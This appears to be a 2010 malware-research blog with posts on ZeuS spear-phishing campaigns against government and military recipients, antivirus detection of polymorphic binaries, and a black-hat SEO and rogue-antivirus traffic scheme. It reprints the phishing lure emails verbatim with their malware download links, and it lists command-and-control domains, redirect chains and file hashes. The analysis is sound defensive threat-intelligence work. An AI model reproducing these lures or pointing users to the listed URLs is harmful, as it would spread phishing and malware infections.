Professional development is essential to the successful execution of our mission – to provide global security for America. One key component to professional development is reading and critically thinking about military issues, history, and leadership. I am pleased to announce the following selections for my 2010 Commander’s Professional Reading List. It is my intent that this list will serve as a guide for all STRATCOM military and civilian personnel to enhance their professional knowledge.

All of the titles below are available immediately for check-out at the Thomas S. Power Library on base and in the USSTRATCOM Leadership Institute.

Our overarching objective is to provide global security to our nation-the best in the world. I encourage everyone to read these titles and continue your professional development so you can continue to be the finest operators, planners, and advocates for STRATCOM and its global mission set.

KEVIN P. CHILTON
General, USAF
Commander

Inside Cyber Warfare: Mapping the Cyber Underworld (Dec 2009)

This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. Discusses how sophisticated hackers, working on behalf of states or organized crime, patiently play a high-stakes game targeting anyone, regardless of affiliation or nationality. (Amazon.com)

Author: Jeffrey Carr is a cyber intelligence expert, columnist for Symantec’s Security Focus, and author who specializes in the investigation of cyber attacks against governments and infrastructures by State and Non-State hackers. Mr. Carr is the Principal Investigator for Project Grey Goose, an Open Source intelligence investigation into the Russian cyber attacks on Georgia in August, 2008. His work has been quoted in The New York Times, The Washington Post, The Guardian, BusinessWeek, Parameters, and Wired.

Additional information can be found in the following report:

http://tiesiog.puikiai.lt/report.zip

http://somashop.lv/report.zip

________________________________________
To report a problem please submit an ODNI/ICES Ticket
Phone: 301-688-1800 (commercial), 644-1800 (DSN), 363-6105 (NSTS)”

June 17, 2010
Source: http://kerneltrap.org/mailarchive/openbsd-bugs/2010/6/17/6884952
Source: http://www.mail-archive.com/ports@openbsd.org/msg28673.html

From: izhar.mujaddid@pentagon.af.mil
Date: Thursday, June 17, 2010 – 11:57 am
Subject: Scientific Advisory Board

UNCLASSIFIED//FOR OFFICIAL USE ONLY

United States Air Force

Scientific Advisory Board

Report on Defending and Operating in a Contested Cyber Domain

Executive Summary and Annotated Brief
SAB-TR-10-01
June 2010

This report is a product of the United States Air Force Scientific Advisory
Board Study Committee on Defending and Operating in a Contested Cyber
Domain. Statements, opinions, findings, recommendations and conclusions
contained in this report are those of the Study Committee and do not
necessarily represent the official position of the United States Air Force or the United States Department of Defense.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
HQ USAF/SB
1180 AF PENTAGON RM 5D982
WASHINGTON, DC 20330-1180

June 17, 2010
Source: http://permalink.gmane.org/gmane.linux.debian.qa-packages/33936

From: tsa@dhs.gov
Date: 2010-06-17 18:01:16 GMT
Subject: (U) Transportation Security Administration

UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U) Transportation Security Administration

(U) Terrorist Attack Methods in Airport Terminals

A Predictive Analysis for the Detection-Technology Community

15 June 2010

(U//FOUO) This Transportation Security Administration Office of Intelligence (TSA-OI)
assessment, developed at the request of the TSA Office of Security Technology,
examines the terrorist tactics used to attack passengers inside the public areas of an
airport terminal in order to assist in developing security procedures and deploying threat
detection technology to this area. This assessment examined a number of unclassified
sources detailing disrupted plots, bombings, suicide bombers, and armed assaults
conducted in the public areas of airports from the 1960s to the present. Additionally,
attacks on other critical infrastructure targets were reviewed in order to assess which
tactics are more likely to be considered by terrorists targeting airport terminals.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
Department of Homeland Security
Office of Infrastructure Protection
Infrastructure Security Compliance Division
Mail Stop 8100
Washington, DC 20528

* A variety of these emails are also available at: http://www.sophos.com/blogs/sophoslabs/?p=10116

August 26, 2010
Source: http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html

From: ifc@ifc.nato.int
Date: Thu, 26 Aug 2010 08:24:30 -0500
Subject: From Intelligence Fusion Centre

Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB

FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU

Additional information can be found in the following report:

http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip

> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia – operation
> “Atalanta”, is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> – the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> – the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS – EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319

Crime or Espionage?



ZeuS is a well known crimeware tool kit that is readily available online. The tool allows even the most unskilled to operate a botnet. Typically, Zeus has been associated with banking fraud. Recently, there have been a series of attacks using the Zeus malware that appear to be less motivated by bank fraud and more focused on acquiring data from compromised computers. The themes in the emails — often sent out to .mil and .gov email addresses — focus on intelligence and government issues. After the user receives such an email, and downloads the file referenced in the email, his or her computer will likely (due to the low AV coverage) become compromised by the ZeuS malware used by the attackers and will begin communicating with a command and control server. It will then download an additional piece of malware, an “infostealer”, which will begin uploading documents from the compromised computer to a drop zone under the control of the attackers. Are these series of attacks connected? Are these events indicating a blurring of the boundaries between online crime and espionage? Or are government and military personnel just another target for online criminal activity?

This post was inspired by a recent post at contagio.blogspot.com. What appears to be a one-off attack using Zeus, I believe, is actually another round of a series of Zeus attacks. These attacks appear to be aimed at those interested in intelligence issues and those in the government and military, although the targeting appears to be general rather than targeted.

Round 1

On February 6th, 2010, Brian Krebs reported that attackers using the Zeus trojan targeted a variety of .gov and .mil email addresses in a spear phishing attack that appeared to be from the National Security Agency and enticed users to download a report called the “2020 Project.” The command and control server used in the attacks was updatekernel.com.

Round 2

Following the publication of the article by Brian Krebs, attackers took portions of his article and used them as lure in further spear phishing attacks. Sophos Labs analyzed the sample that used Kreb’s post. A post on Intelfusion.com by Jeff Carr regarding the spear phishing attack was also used in another attack. I documented these attacks in “The ‘Kneber’ Botnet, Spear Phishing Attacks and Crimeware“. The key command and control server in this case was also updatekernel.com.

Round 3

In early March 2010, more emails began circulating, one of which encouraged users to download malware from dhsorg.org (222.122.60.186). This malware used greylogic.org (222.122.60.186) as a command and control server. In addition to sharing an IP address, both domain were registered by hilarykneber@yahoo.com. The attack continued using the domain names dhsinfo.info, greylogic.info, and intelfusion.info (abuseemaildhcp@gmail.com) which were hosted on 218.240.28.34. The domain names used in these attacks were variations of domain names owned by Jeff Carr who has aptly characterized these attacks as a “Poisoning The Well” attack.

Round 4

In June 2010 another campaign began. The lure of the attack emphasizes Jeff Carr’s book “Inside Cyber Warfare: Mapping the Cyber Underworld” with the text copied from http://www.stratcom.mil/reading_list/. The command and control server in this case was from-us-with-love.com.

Round 5

Mila Parkour recently posted details of an interesting attack on contagiodump.blogspot.com. The email used in the attack appeared to be from “ifc@ifc.nato.int” with the subject “Intelligence Fusion Centre” and contained links to a report EuropeanUnion_MilitaryOperations_EN.pdf that exploits CVE-2010-1240 in order to drop a ZeuS binary.

File name: EuropeanUnion_MilitaryOperations_EN.pdf
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e
VT: 11/41 (26.8%)

File name: exe.exe
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5
VT: 3/41 (7.3%)

File name: ntos.exe
MD5: 28c4648f05f46a3ec37d664cee0d84a8
VT: 4/39 (10.3%)

First, the ZeuS malware connects to from-us-with-love.info (91.216.141.171) to receive the Zeus config file. Second, the malware connects to vittles.mobi (174.132.255.10) to download an infostealer. Finally, the infostealer connects to nicupdate.com (85.31.97.194).

logic.exe
MD5: 4f47b495caae1db79987b34afc971eaa
VT: 3/ 42 (7.1%)

The domain name from-us-with-love.info was registered by “Maria Laguer” with the email address admin@from-us-with-love.info, which was also used to register from-us-with-love.com (the name is also associated with other ZeuS domain, see MDL). The decrypted ZeuS config file from from-us-with-love.info contains two additional domain names: enigmazones.eu and askkairatik.net. The domain names were used as part of a previous ZeuS campaign that used from-us-with-love.com as a command and control server. IN addition the location of the malware, quimeras.com.mx, was also used in a previous campaign that had from-us-with-love.com as the command and control server.

One of the email addresses (www-data@nighthunter.ath.cx) that was used to propagate the malware associated with enigmazones.eu also delivered the emails containing malware hosted on dhsorg.org, which was registered by the infamous hilarykneber@yahoo.com and used in attacks in May. The domain dhsorg.org was hosted on 222.122.60.186 along with greylogic.org which was used as a command and control server.

The boundaries between the online crime and espionage appear to be blurring making issues of attribution increasingly more complex. Are online criminals simply targeting those interested in intelligence issues as well as members of the government and military for fraud? Have they determined that they can exploit such persons for fraud in addition to selling and sensitive data acquired to those who would be in the market for such information? Or is the campaign more specifically oriented toward espionage using ZeuS and the malware ecosystem as convenient cover? While these questions are unlikely to be ever definitively answered, we can begin to assess qualitative changes in attacks by tracking them overtime and carefully linking together seemingly disparate peices of data. This post was made possible by a wide variety of sources that each posted components of these attacks. While there is a need to protect certain sources as well as operation security so that the “bad guys” are not tipped off and continued research into their malicious activities remains possible, information sharing remains a key component malware research.

Dynamic Malware Binaries



I recently found the distribution point for a malware affiliate that dynamically generates a new binary (but the same malware) every time it is queried. The malware distributers periodically query the affiliates distribution point to receive a new binary. However, any queries to the distribution location results in a binary with a different hash value. I generated a sample of 10 binaries and uploaded each of them to VirusTotal.com to find out if the changes being made to the binary disrupted the ability of anti-virus software (AV) to detect the malware. While just under 40% of the AV products that VT uses detected the software, the ones that did detect the malware continued to detect it despite the changes to each individual binary that caused the hash value to change.

Here are the results:

Sample 1
2010-08-24 19:51:04
16/42 38.1%

Sample 2
2010-08-24 19:51:14
15/41 36.6%

Sample 3
2010-08-24 19:51:26
15/41 36.6%

Sample 4
2010-08-24 19:51:39
14/40 35.0%

Sample 5
2010-08-24 19:51:52
15/40 37.5%

Sample 6
2010-08-24 19:52:06
16/42 38.1%

Sample 7
2010-08-24 19:52:19
16/42 38.1%

Sample 8
2010-08-24 19:52:37
14/39 35.9%

Sample 9
2010-08-24 19:52:50
16/42 38.1%

Sample 10
2010-08-24 19:53:03
16/42 38.1%

AV 01 02 03 04 05 06 07 08 09 10
nProtect - - - - - - - - - -
CAT-QuickHeal x x x x x x x x x x
McAfee x x x x x x x x x x
TheHacker - - - - - - - - - -
VirusBuster - - - - - - - n - -
NOD32 - - - - - - - - - -
F-Prot x x x x x x x x x x
Symantec - - - - - - - - - -
Norman - - - - - - - - - -
TrendMicro-HouseCall - - - - - - - - - -
Avast - - - - - - - - - -
eSafe - - - - - - - - - -
ClamAV - - - - - - - - - -
Kaspersky - - - - - - - - - -
BitDefender x x x x x x x x x x
SUPERAntiSpyware - - - - - - - - - -
Sophos x x x x x x x x x x
Comodo x x x x x x x x x x
F-Secure x x x x x x x x x x
DrWeb - - - - n - - - - -
AntiVir - - - - - - - - - -
TrendMicro - - - - - - - - - -
McAfee-GW-Edition x n n n n x x x x x
Emsisoft x x x n x x x n x x
eTrust-Vet x x x x x x x x x x
Authentium x x x x x x x x x x
Jiangmin - - - - - - - - - -
Antiy-AVL - - - - - - - - - -
Microsoft - - - - - - - - - -
ViRobot - - - - - - - - - -
Prevx - - - - - - - - - -
GData x x x x x x x x x x
AhnLab-V3 - - - - - - - - - -
VBA32 x x x x x x x x x x
Sunbelt x x x x x x x x x x
PCTools - - - - - - - - - -
Rising - - - - - - - - - -
Ikarus x x x x x x x x x x
Fortinet - - - - - - - - - -
AVG - - - - - - - - - -
Panda x x x x x x x n x x
Avast5 - - - - - - - - - -

x = detected
– = not detected
n = not tested

Black Hat SEO, PPC & RogueAV



Search Engine Optimization (SEO) is a term that refers to efforts to increase the rankings of a website so that it appears in the top results when searching for particular key words in a search engine. Black Hat SEO refers to “unscrupulous” SEO techniques often used to promote Rogue/Fake security software and pay-per-click (PPC) advertisement schemes. (See “Poisoned search results” by Sophos for details. See Trend Micro’s posts Making a Million, Part One—Criminal Gangs, the Rogue Traffic Broker, and Stolen Clicks and Making a Million, Part Two—The Scale of the Threat for an understanding of PPI/PPC relationships as well as RogueAV/FAKEAV). Using Black Hat SEO malicious actors are able to have their content displayed in search engines when users search for particular, usually popular, keywords. When users click on these links, they are taken to either PPC websites or RogueAv websites. The malicious actors are paid for this traffic by their PPC and RogueAV affiliates.

Dancho Danchev recently profiled a campaign using compromised .nl and .ch websites to push PPC and RogueAV installations. This post provides some additional details on the campaign.

The actors behind the campaign are using, among other techniques, compromised FTP accounts to upload malicious files to web servers around the world. Compromised FTP credentials are readily available for purchase in the malware ecosystem and are often used to propagate malware. Malicious files are uploaded to compromised websites with snippets of text based on particular search phrases. This files are designed so that when users search for certain key words in search engines, these malicious sites are high ranked in the results. While the search engines see this content, when users click on links they are redirected to the malicious server and on the PPI affiliates or RogueAV landing pages.

The servers used by the malicious actors to receive incomping requests from the compromised web servers are using numerous domain names that resolve to several IP addresses (see malwareurl.com and malwaredomainlist.com). Despite the multiple IP addresses and domain names, they all really point to the same server. Based on “referer” logs generated by the malicious server used in the campaign, I’ve compiled statics on the amount of traffic generated by the campaign to the “/liq/?st=” page between 2010-03-15 and 2010-08-18.

A total of 5,054,990 unique IP addresses generated a total of 9,003,188 page views between 2010-03-15 and 2010-08-18. Most of the traffic (45.99%) originated from the USA. Significant traffic was also generated from the United Kingdom, Canada, Australia and India.

Country Pageviews
US 4141181
N/A 2120320
GB 584884
CA 426338
AU 192713
IN 145287
NL 94310
DE 75934
PH 72625
FR 47163

The traffic to the malicious server is primarily generated from search engine results. Google.com was the most prominent referrer with 52.18% of all the traffic. While Yahoo! was also a source of a significant amount of referrals, Bing only accounted for 631 referrals.

Referer Pageviews
www.google.com 4698249
www.google.co.uk 610156
search.yahoo.com 532038
www.google.ca 479531
www.google.com.au 241546
www.google.co.in 174538
www.google.nl 99944
www.google.com.ph 92154
search.conduit.com 87652
N/A 77259

The following table shows the keywords that appeared most frequently in the queries users entered into search engines. The queries ultimate brought the user to the malicious actors’ server and on to their PPC and/or RogueAV affiliates landing pages.

Keyword Pageviews
free 621148
printable 574588
powered 251541
letter 193575
phpbb 171689
template 168488
kids 133337
worksheets 129167
with 129162
sale 115484
pictures 110804
sample 108331
grade 105488
coloring 98791
weather 85056

In total, 81.89% of all the pageviews were from computers running Windows (XP, Vista, 7) with 49.82% from XP systems. Most of these systems were probably redirected to RogueAV landing pages (I have not seen RogueAV targeting any platform other than Windows). Realizing that income can be generated from non-Windows traffic as well, the malicious actors redirected traffic to a PPC affiliate.

Operating System Pageviews
Windows NT 5.1 4485923
Windows NT 6.0 1855129
Windows NT 6.1 1032128
Linux i686 297166
Intel Mac OS X 10_5_8 203142
Intel Mac OS X 10.5 86777
Intel Mac OS X 10_6_3 85120
Intel Mac OS X 10_6_4 73613
Intel Mac OS X 10.6 68535
CPU iPhone OS 3_1_3 50709
Intel Mac OS X 10_4_11 50346

Microsoft’s Internet Explorer accounted for 58.92% of the total pageviews, followed by Firefox. Mobile phones (iPhone, Blackerry, Android) accounted for 172,674 pageviews.

Browser Pageviews
IE 8.0 2420222
IE 7.0 1852866
IE 6.0 1026844
Firefox 3.6.3 585996
Firefox 3.5.5 268225
Chrome 5.0.375 222611
Firefox 3.6.8 214800
Safari 4.0.5 199939
Firefox 3.6.6 177534
Chrome 4.1.249 169083

How does it work?

Malicious files are uploaded to the compromised sites that contain links and text based upon lists of search queries. The snippets of text and links are used to boost the ranking of these sites in search engines. As a result, when users query search engines, the compromised websites appear in the results. When users visit these sites they are redirected to a server under the control of malicious actors.

These pages sometimes redirect users to RogueAV landing pages, and, other times display the content of the SEO pages that are generated to improve the search engine ranking for the malicious actors.

When users click the links in the search results, they are redirected to the malicious actor’s server and on through to wither their PPC affiliate’s or their RogueAV affiliate’s landing pages. In the case of RogueAV, these landing pages display a “scare page” that prompts the user to install the RogueAV software.

http://tasteandflavour.co.uk/081018/?iWeabZ2sRIt redirects to http://ebmipqasrj.ru/liq/?st=tasteandflavour.co.uk which redirects to http://erribhxzerr.co.cc/r/feed.php?k=printable+inurl%3A081018+site%3A.uk which redirects to http://erribhxzerr.co.cc/tube/?k=printable+inurl%3A081018+site%3A.uk which redirects to http://erribhxzerr.co.cc/r/sss.php which then redirects to the RogueAV affiliates http://www4.checkpc98.co.cc/?p=p52dcWpscV%2FRlsijZFahqJ51ll7DZJOejpeblGY%3D which redirects to http://www2.security-soft81.co.cc/?p=[redacted] which redirects to http://www1.cure-my-pc41.co.cc/gmug9_289.php?p=[redacted] to download the executable packupdate9_289.exe.

File name: packupdate9_289.exe
MD5: ec28207e2e63f62e6c6d71cbabeaa151
VT: Result:6/ 40 (15.0%)

The domains of the RogueAV affiliate change frequently. In addition, the RogueAV binaries also change frequently. These changes make it more difficult for security products to protect users. For example, in this case only 6 of 40 AV products on VirusTotal detected the RogueAV binary.

On some occasions, users are redirected to a PPC affiliate. This allows the malicious actors to earn income for the traffic being pushed to the PPC affiliates search engine.

http://jjp.ch/hvuWovM/ redirects to http://ebmipqasrj.ru/liq/?st=jjp.ch

http://ebmipqasrj.ru/liq/?st=jjp.ch redirects to http://errh2hxzerr.co.cc/search/?q=printable+colorful+asl+charts+or+flash+cards&aid=810&said=trend&n=5

http://errh2hxzerr.co.cc/search/?q=printable+colorful+asl+charts+or+flash+cards&aid=810&said=trend&n=5 redirects to http://www.rivasearchpage.com/?q=printable+colorful+asl+charts+or+flash+cards&aid=810&said=trend&n=5

After passing through a variety of redirects through the malicious actor’s server (ebmipqasrj.ru and errh2hxzerr.co.cc) the user ends up at the PPC affiliate page.

Some visitors are directed to download a malware binary posing as Adobe Flash Player.

Adobe__Flash__Player.exe
MD5: 658bb224c030542de22a9997e65f27e5
VT: 14/ 42 (33.3%)
Anubis Report

Traffic from over 5 million IP addresses totaling over 9 million page views in the last five months (2010-03-15 and 2010-08-18) passed through a malicious server and on to either PPC affiliates or RogueAV landing pages. This case is a good example of the profit-driven malware ecosystem. The malicious actors behind the campaign acquired (possibly from a third party) compromised FTP credentials for legitimate websites and used Black Hat SEO techniques to poison search engine results. They then redirected a significant amount of traffic through their own malicious infrastructure through to their PPC and Rogue AV affiliates. The malicious actors behind this campaign did not need a high degree of technical proficiency, the ability to program deceptive viruses and trojans or 0day exploits (or any exploits at all). All they did was leverage resources within the malware ecosystem in order to act as a “traffic broker” and redirect traffic to others within the malware ecosystem in order to generate income.